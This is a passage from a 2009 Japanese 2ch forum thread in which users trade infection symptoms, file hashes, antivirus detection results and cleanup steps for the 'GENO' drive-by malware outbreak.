あー 感染してたっぽいなぁ俺w
>ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという

ちなみにシステムの復元でそれはなくなった。
感染の兆候も見られない。

116 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:24:34
>>114
有名どころだと↓をインスコするとか。。。
外人さんが作った物だけど日本語表示化だから。

HashTab Shell Extension
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html

作者サイト
ttp://beeblebrox.org/hashtab/

117 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:27:40
>>116
ありがとうございます

118 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:27:56
UACあるのにVistaが感染するわけないだろjk

119 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:31:15
あきらめてクリンインストします・・・

120 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:34:30
sqlsodbc.chmがないんだけど・・・

121 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:36:06
感染してないのはここら辺の問題かと
ttp://www.atmarkit.co.jp/fsys/kaisetsu/045dep/dep.html

122 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:37:30
クリーンインスコする前にcombofix使えよ

123 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:48:39
combofix使っても無駄だろ・・・・・

124 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:53:47
>>84
うちのは

CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3

と出ているのですけどこれは改変されていないのでしょうか?

125 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:54:41
>>124
大文字小文字の差異はあれ一致だね

126 ::名無しさん@お腹いっぱい:2009/04/08(水) 22:55:06
IEやFirefoxが不安定、regedit起動不可等
trojan.killAV に感染してた、ノートン試用版にて駆除
今のところおかしな動きなしです。

127 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:55:27
>>125
ありがとうございます。

128 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:56:58
感染した人のsqlsodbc.chmはやっぱり全然違うんかな

129 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:59:04
ノートンは対応したのか、NODはまだだよな?

130 :11:2009/04/08(水) 23:05:27
sqlsodbc.chmの場所は
c:\windows\system32\sqlsodbc.chm
です。
Vistaであるかは後で確認する。

ComboFixは場合によってはログインできなくなるかも。
2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後
ログインできなくなった。
2回目はセーフモードで試し、無事ログインもできたけど処理数0
(つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず)


ComboFixを試すのはいいけどやるんだったらセーフモードで、
ログインできなくなるリスクもあるから自己責任で。。。
(ログインできなくなると、リカバリーCDからしかリカバリできないから
注意)

131 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:07:21
ビスタも感染するんですよね?しないって言ってる人もいるけど

132 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:07:55
申し訳ありませんが

sqlsodbc.chm

sqlsodbc
は同一の扱いなのでしょうか?

133 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:08:48
>>131
する

>>132
拡張子表示させれ

134 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:17:14
>>132
sqlsodbcというファイル名は一つしかないから
同じ。
拡張子を表示する設定
http://www.cdwavmp3.com/dl/extention/ext_hyouji.html

135 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:18:51
UACあってもVistaで感染するの?そのためのUACだと思ってたんだが
ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして

136 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:20:40
>>135
vistaで踏んだあとxpで再び踏んだら多分アウト

137 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:21:14
>>1
>WINDOWSの正規ファイルを上書き(?)する可能性大

この時点でUAC発動してバレバレだしな

138 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:24:16
>>133>>134
申し訳ありませんでした

139 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:25:57
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
http://tsushima.2ch.net/test/read.cgi/news/1239178101/

【新種ウイルス】GENOを語るスレ31【無料配布中】
http://pc11.2ch.net/test/read.cgi/pc/1239197673/

【ウイルス】GENOを語るスレ31【完治】
http://pc11.2ch.net/test/read.cgi/pc/1239199378/

【8BOAA】 GENOを語るスレ26 【zif付き】
http://pc11.2ch.net/test/read.cgi/notepc/1232024693/

【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/

★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/

【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/

PC通販サイト「GENO」のサイトに改ざんの疑い
http://tsushima.2ch.net/test/read.cgi/news/1239185232/

140 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:26:11
UACあってもUserが許可しちゃえば感染するだろ

もう一回感染実験してくるノシ

141 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:27:39
CRCは家の環境でも上のやつで一致でした。

142 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:30:31
旧プログラムw

143 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:34:20
XPでもDEP有効にしてれば防げるのか?

144 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:42:46
XPsp2なんだけど、

sqlsodbc.chm
C:\WINDOWS\system32
1.29 KB (1,323 バイト)

MD5:BF7209B9589AD09A25740F6D47D0ADEA
CRC32:7585CBB6
SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008

ファイルサイズからして全然違う。
アウトかね

145 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:43:04
>>143
まだわかんない。

ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。

それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。

146 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:43:45
>>144
おそらくそれはご愁傷様コース。
多分確実に食らってる。

147 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:44:23
>>144
PC挙動もおかしいですか?

148 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:48:43
>144
タ、タイムスタンプは?タイムスタンプは変わったの?

149 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:48:53
>147
2日前、
WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。

IEとプニルがすぐ落ちる等、挙動がおかしかったんで、
avast入れてスキャンするも何も検出されず。
システムの復元は普通にブラウジング出来たんで、
クリンインスコせずに今に至る。

面倒くさがらずにクリンインスコするか

150 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:49:04
sqlsodbc.chmの
更新日時が1年前だったが、これは大丈夫かな?


151 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:52:41
>>149
d
残念ながらアウツですな

152 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:53:07
>148
作成日時:2005年3月29日、17:20:39
更新日時:2007年4月17日、0:53:08

153 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:53:31
>>150
今すぐファイルサイズ確認しれw

154 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:58:49
>>152
重要な情報だわ。

なんかそのハンパな日時が肝なのかもね。

基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。


155 :名無しさん@お腹いっぱい。:2009/04/08(水) 23:59:32
>>153
作成日時2009年4月1日、21:20:18

更新日時2008年4月14日、21:00:00

50,727 バイト

156 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:03:39
avastで踏むも更新前だったのでスルー
その後a-squadで検出・削除

readerは8.14、フラッシュは最新だったと思う

不気味な事に不審な挙動全く無し・異常なし・・・

これってもうゾンビにされてる?

157 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:05:55
>>156
a-squadだと踏んだ後でも検出されるんだ、ヨカタ。
一度踏んだとなると怖いね。

今話題のsqlsodbc.chmも調べてみれば?
といっても感染したのは確定してるのか

158 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:06:13
>>155
>>92
セーフっぽいね

159 :144:2009/04/09(木) 00:06:39
人柱となった代わりに、
踏み台にされると実際どんな被害があるのか教えてくれないか?

とりあえず、すぐにでも再インスコした方がいいよね…

160 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:07:14
えと、最近使ったファイルに最近使った試しのないファイルがどんどん出ているけど
まさかこれ暴れだしたってことだろうか

161 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:07:24
>>99ダタ

162 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:08:56
数回にわたる作業の末やっとましな結果が出た。
Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成

で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離
再起動後、レジストリエディタ起動、特定のサイト
(bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、
ブラウザ安定でかなりいい結果じゃないかと。

bxatg.mnnの検体は可否スレに報告しておきます。

で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗
一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを
ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。
二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・

三回目(今回)再びセーフモードで以上の結果でした。
もうちょっと検証必要っぽいので"ComboFixを過信"しないように
またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm
は今のところ実害なし(?)この改変されたやつのハッシュは
ae325e35760718d46bcebc4ad5fab953

163 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:09:06
>>158
よかった!ありがとう!
でも不思議なことにantivirが定期的にバックドアーを検出するんだよ
これとはまた別の何かかもしれないが

164 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:11:14
>>163
俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる

165 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:37
>>159への害はPC激重、キーロガーでこれから打つキー情報抜かれるかもetc.。
でも最インスコすれば失った時間と消すことになるデータ以外は解決

ほっといた場合>>159のパソコン経由で悪さされるかも

166 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:40
c:\windows\system32\sqlsodbc.chm
のsqlsodbc.chmが見つからない!

osはXP sp3 何かソフトいれないとだめなの?
 

167 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:56
>>159
リカバリは当然したほうがいいでそ。
実際何送信してるのかは未確定なのかな。

>>160
ファイル名うpればみんなの助けになるかも

168 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:19
>>159
このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。

あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。

それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。

とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。

169 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:40
>165
再インスコ前に、
専ブラのログ、各種アプリ設定ファイル、エロ画像
諸々バックアップしときたいんだけど、
それにもウィルスくっ付いてくる可能性はある?

170 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:46
俺のsqlsodbcは更新が2002年8月31日、21:00:00だぜ
ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど
誰か同じ人いる?

171 :162:2009/04/09(木) 00:19:10
sqlsodbc.chmは
サイズ 1,323バイト
ディスク上のサイズが 4,096バイト

172 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:20:38
>>171
作成日時と更新日時は?
>>152さんと一緒?

173 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:21:11
>>167
今のところだいぶ前に落としたり自分で作ったファイルなどが最近アクセスされた扱いになってる
今のところ更新はされていないようだけどこの先はどうなるかわからない

174 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:21:34
>>157
作成日時 2006年3月2日、21:00:00
更新日時 2006年3月2日、21:00:00

ハッシュ:F639AFDE02547603A3D3930EE4BF8C12

175 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:22:34
>>148
イサキを思い出す。


人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。

他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。

sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。

176 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:23:00
有名な店だから決行感染してるんじゃないか
感染にすら気づいてない奴がほとんどだと思う

177 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:25:27
>>169
各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい

このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を

ありきたりの事しかいえなくてすまないね

178 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:26:42
流れをまとめるとこんな感じであってるだろうか
http://www29.atwiki.jp/geno/pages/14.html

179 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:27:27
>>175
間違いなく感染してるよそれw
数回実験したけどまったく同じ症状でた。
断言する、絶対GENOウイルスに感染してるw

180 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:27:38
ちょ、パピーヌとクレストロンジャパンはまだサイト閉じてないのかw

181 :144:2009/04/09(木) 00:27:54
>175
今履歴見てみたら、
BAT.trojanってのがあった。
ノートン先生が遮断してくれたみたいで、
tempフォルダから見つかってる。


182 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:28:50
>>179
デスヨネーw

sqlsodbcは時間が無くて調べてないんだ。
献体PCはもうしばらく取っておくから、「こことかこれ調べてみてくれ」ってのあったら
調べてみるお

183 :156=174:2009/04/09(木) 00:28:51
ちなみにIE8でXPのSP3です
news/?id=2に行ったけどPDFは起動しませんでした

184 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:31
>>174
改変されてないみたいですね

185 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:36
会社の数台のPCが感染してるってのは奇妙だな
まさか全てのPCがGENOやjuicyrock開いたわけでもないだろうし

186 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:47
http://pc11.2ch.net/test/read.cgi/pc/1239197673/39

39 :名無しさん :sage :2009/04/09(木) 00:14:21 0

前スレの958です。

combofixで検疫したファイルをVirustotalでスキャンしてみた。

ファイル名 _ycmmf_.cjq.zip 受理 2009.04.08 17:04:29 (CET)
現在の状態: 読込み中 ... 順番待ち 待機中 スキャン中 完了 発見せず 停止
結果: 7/40 (17.5%)

検知できたのは以下の7つのウィルス対策ソフトだけでした。

AntiVir TR/Agent.caaj.B
Avast Win32:Trojan-gen {Other}
eTrust-Vet Win32/SillyDl.HDU
GData Win32:Trojan-gen {Other}
McAfee-GW-Edition Trojan.Agent.caaj.B
NOD32 variant of Win32/Delf.OEX
Prevx1 High Risk Cloaked Malware

AVGもカスペルスキーもダメでした。

187 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:31:39
そうそう、それと感染中っつか発症中のコンピュータで
C:\WINDOWS\ 直下や C:\Documents and Settings\username\Local Settings\ 直下に
ファイルが生成され、先生はそれを Trojan.KillAV として検出してた。

で、さっさと検疫に移動させるんだけど次から次へと同じファイルが生成されて
検出リストがエラいことにwww
作成ユーザーが、ログオンユーザー以外に SYSTEM とか NETWORK SERVICE とかもいてフイタw
もう俺の手には負えないって素直に負けを認めたwwwww

188 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:31:46
>>175
ちょっとまえっていつごろから?
やはり先週土曜辺り?

それより前からの情報は出てきてないよね

189 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:00
>>186
カスペが駄目なのか


190 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:36
>>184
そうか!ありがとう!
俺は運が良かったのかな

191 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:51
******まとめ*******
感染確認方法
・sqlsodbc.chmのハッシュを調べて
F639AFDE02547603A3D3930EE4BF8C12
と異なる値が出た場合感染してる可能性あり

・以下のサイト(有名な駆除ツール)にアクセスできなければ危険
(鯖落ちじゃない限り、ほぼ感染してると見て問題ないと思う)
ttp://download.bleepingcomputer.com/sUBs/ComboFix.exe

・パソコン再起動後、regedit.exeを起動しようとすると
explorerが落ちる場合、確実に感染してます。

・ブラウジングがまともにできない

駆除方法
完全な駆除方法は今のところない。(断定するのは現段階では危険)
セーフモードで、ComboFixを実行すればある程度よくなるかもしれない程度。
以上の問題が解決していればある程度よくなってるかも。

192 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:34:02
>>185
どこのサイトとは言えないけれど、ヤられたサイトを開いた覚えがある、っていう証言はあるんだわ。

で、ちょっと疑問なのが、問題が発生し始めたのが3月末っていうこと。
GENOウイルスが騒がれ始めたのは4月に入ってからだし、
もしかすると会社の数台のPCは今回のGENOウイルスとは関係ないのかも試練。

とりあえずログは漁ってみるけどねー

193 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:34:35
>>188
>>192で書いたけど、3月末からなんだわ

194 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:36:33
>>190
いや、でもそれはあくまで一つの目安であって
どういう挙動をするかまだはっきりしてないから安心はしないで。。

195 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:08
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
http://tsushima.2ch.net/test/read.cgi/news/1239178101/527

527 名前: ジョウシュウアズマギク(新潟県)[sage] 投稿日:2009/04/09(木) 00:31:39.93 ID:35GKJh/C
avastはさっきの更新で駆除まで出来るみたいだけど、
亜種に対してどうなのかは不明
誰か踏んでみてくれ 俺は嫌だ


avastで駆除できんの?

196 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:11
>>191
regedit 以外に、cmd も同様の症状でないかな?

regedit.exe をコピーして違う名前(aaaaaaaa.exeとか)にすると起動できるんよね。
コピー 〜 regedit.exe では explorer が落ちるわ。

197 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:19
>>187
それ、セーフモードやUbuntuCDでも削除できなかったけど
Bart'sPEというソフトで作成した起動CDで,C:\Windows直下からは削除出来たよ。

でその後はC:\RECYCLERフォルダ内へ名前を変えて移動してるので、そいつも削除したら
取りあえず何とかなるかも・・・

198 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:38:39
あ、ここID出ないのか。
>>175 = >>182 = >>187 = >>192 = >>193 = >>196 っす。
スマソ

199 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:39:53
>>193
THX
どっからもらったかはっきりしないのはgkbrだね。
もしかしたらまだ絶賛垂れ流し中の可能性もあるし、
そういうサイトが無数に出てきたらヤバス

200 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:40:10
>>197
d
Bart'sPEか。調べてみて時間が取れればチャレンジしてみるよ。
まあどのみち感染PCはフォーマットかけて再インスココースなんだけどね。
消す前に調べられる(&試せる)ことはやっておきたいなー。

201 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:41:25
>>199
幸い、各コンピュータの操作ログは取ってあるので、
ファイル生成ログを追っかければ多少は追求出来るかも。
ただ生成されたファイル名がわからんので手探り状態だけどね。

202 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:41:43
昨日半年ぶりくらいに以前使ってたパソコンを起動してどこのサイトも開く前に
Windowsアップデードしようとしたら失敗して再起動しようとしてら起動出来なくなったんだけど
このウイルスのせいなのかな。こんなことってありえるの?

203 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:42:28
ウイルスバスター2009は駄目駄目。
VPC上でA-SQUARED FREEで検知かかるのにバスター君は最新でも完全にスルー

気になったので、脱線してちょっと古めの検体を用意。
(BiosEdit内にトロイの木馬とバックドア付)、A-SQUARED FREEは検知するがバスター君またもやスルー

トレンドよ、最近TVCMやって拡販してるが大丈夫か?

204 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:43:36
>>202
情報が足らんのでGENOウイルスのせいとは言えんが、
そういうことは割とあり得る。
物理的な故障の気配を感じるけどな。

205 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:43:44
>>192
海外では3月28日の報告があるみたいだ。
思ったより早く攻撃が始まっていたのかも。

http://www.dynamicdrive.com/forums/archive/index.php/t-43390.html

206 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:44:39
A-SQUARED FREEは誤検地も多いけど、ちゃんと検地してくれるのは救いだね。
名称は良く出てたやつでいいのかな

207 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:44:46
>>205
3/28て割とビンゴなんですがw

208 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:46:28
>>205
途中送信してしもた。
3/28は割とビンゴ。

3/30から症状が出たっつーのと、3/27・・・だったかな、から症状が出てたっつーのがある。

209 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:50:27
>>185
おまいちゃんの会社のPC、PROXYかませてないの?

もしSquid等でPROXY立てて噛ませているのなら
当該PC利用者のログインID等を元にSquidのログを追えば
きっと感染源が特定出来ると思うよ。

古いログを上書きして消される前にとっとと調べたほうがいいかも。

万一取引先の会社の鯖が感染してるとか、最悪自社のイントラ鯖が感染していたら
洒落にならないよ。社内的に。

210 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:51:09
10日近くたって未だに検知スルーと挙動不明ってのはキビシイな。
そんな対応遅れた記憶ないわ

211 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:52:10
>>191
>以下のサイト(有名な駆除ツール)にアクセスできなければ危険

あの、そこに入ろうとしたら入れてあったウイルス探知ソフトがブロックしてしまったのですけど
それも危険なのでしょうか?

212 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:52:43
>>209
マルチ乙www

213 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:54:02
>>212
てへっ♪

一杯呑んでほろ酔いだからアレだなw

214 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:54:18
>>212
マルチじゃなくて誤爆だろw

215 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:38
>>209
Proxyないんだぜwww
基本内部から外部へは全パケット通すんだぜwwwwww
以前Proxy提案したことあるけど、「インターネットが遅くなる(と利用者から苦情が来る)からダメ」って言われたんだぜwwwwwwww

うちみたいなユルユルの会社、他にあるんだろうか。

216 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:38
>>214
誤爆先がアレ過ぎて笑えないんだけどなw

217 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:40
>>192
このウイルスは今年一月から活動してる
べつに不思議なことじゃない

218 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:01
>>194
立った今データ実行防止でexploerが落っこちた・・・これは

219 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:24
>>215
もしかして、あの有名な荒らし新聞社の方ですか?w

220 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:27
誤爆にレスした俺(´・ω・`)

221 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:57
ちなみにこんなことされてます
ttp://ranobe.com/up/src/up350858.jpg
COMODOとaviraは無反応でした

222 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:09
>>217
d
じゃー一般人(?)が引っかかりやすい環境が整ったのが最近ってことかな。

223 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:20
>>191
そのURL、「危険」と出てアクセスできないが・・・。(ウイルスバスター2009で)


224 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:42
>>219
マスゴミなんかと一緒にしないでくれw

225 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:00:02
>>218
><

226 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:00:11
>>以下のサイト(有名な駆除ツール)にアクセスできなければ危険
ウイルス対策ソフトがブロックした場合は問題なし、
一部のソフトで検出しちゃうから>ComboFix

227 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:01:37
bxatg.mnn(tempに落とされるやつ)
はexeファイルだな。
こいつが親玉でFAかな

228 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:01:48
>221

inetnum: 114.160.0.0 - 114.191.255.255
netname: OCN
descr: NTT Communications Corporation

229 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:02:28
>>227
ほう
ファイル生成ログでそのファイル名探してみるわ

230 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:02:32
>218

バッファーオーバーフロー

231 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:04:05
>>191
取り消されたアクションてなるってことは…orz

232 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:07:20
>>231
感染してる可能性ありありw
一応sqlsodbc.chmのハッシュ、regedit.exeも試してみてくれない?

233 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:08:13
>>231
ご愁傷様です。

234 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:08:59
サイト見ただけでウイルス感染とかありえるの?
マルウェアとかスパイウェアならともかく
exe開かなきゃ大丈夫じゃないの

235 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:07
>>234
あり得るも何も、みんなそのせいでこーして大騒ぎしてるんでしょうがw


236 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:19
>>234釣られてやるよ
>>1読んで理解できないならググるなりしてパソコンの知識付けな

237 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:35
だから・・・

238 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:13:06
>>191
アバストで感染なしと言われたあとそこにアクセスしたら、「零」さまが反応して隔離しましたよ・・・


ちなみにビスタで最新バージョンです。

239 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:00
>>234
568 名前: カキツバタ(兵庫県)[] 投稿日:2009/04/09(木) 00:48:06.52 ID:vdIiBaJc
あるサイトに行っただけでウイルス感染とか信じてる
情報弱者ってまだいたんだびっくり
exe開かない限りそんなのねーから

240 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:10
ゼロが反応とかギャグだな

241 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:18
みなさんはJavaスクリプトは通常は切っておいて必要な時だけオンにしてるんですか?

242 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:25
238
ちなみにそれトロ屋さんだって言われましたw

243 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:16:18
ていうかこのスレ読んでるのにまだゼロ使ってるのかよ

244 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:20:21
NoScriptでjsも読み込んでないし、そもそもgenoとか踏んでないし、怪しいIPは除外してるんだが
CドライブとDドライブでパーティション切ってて
DにもXP入れたんだけど認証しわすれて起動できないからデータ用にしてるのよ
でもシステムファイルとか残ってるんだが、Dはフォーマットしたほうがいいのかな
スレチな感じだけどみんな詳しそうだから質問させてください

245 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:21:19
>>241
うちはPCの台数を物理的に増やして、2chや普通にWeb閲覧する奴を専用化して、
そのPCには個人情報からなにから一切要れずに
万一ウィルスを食らってもとっとと再インスコすれば良いだけの状況で使ってる。
その代わりJavascriptは常にオン。

で、銀行だとかネット通販で買う場合はそれ専用の別のPCを使うんだけど、
今回みたいに通販サイトでこーいう事態も起きたから、ちょっと運用を見直さないと駄目だと思ってる。

246 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:21:43
>241

つSleipnir

247 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:22:02
>>232
regedit.exe 起動できる
sqlsodbc.chmのハッシュの見方がわからないけどサイズは49.5KB(50,727バイト)
今気づいたけどCPUの使用率が100パーセント近い…

248 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:22:19
>>239
さすがν速、真の情弱はν速にいるんだな

249 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:24:11
>>247
MD5はこのソフトで確認すると楽
http://www.vector.co.jp/soft/win95/util/se368065.html

installくりっくすれば右クリックから調べられる

250 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:27:22
>>249
これは便利で楽だな

251 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:28:13
不安な人のために言っておくけど
画像とか動画とかテキストファイルとかバックアップとっても
コード埋め込みとかはしないからバックアップはとってリカバリーすること

252 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:28:44
ttp://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html
こっちもおすすめ

253 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:29:09
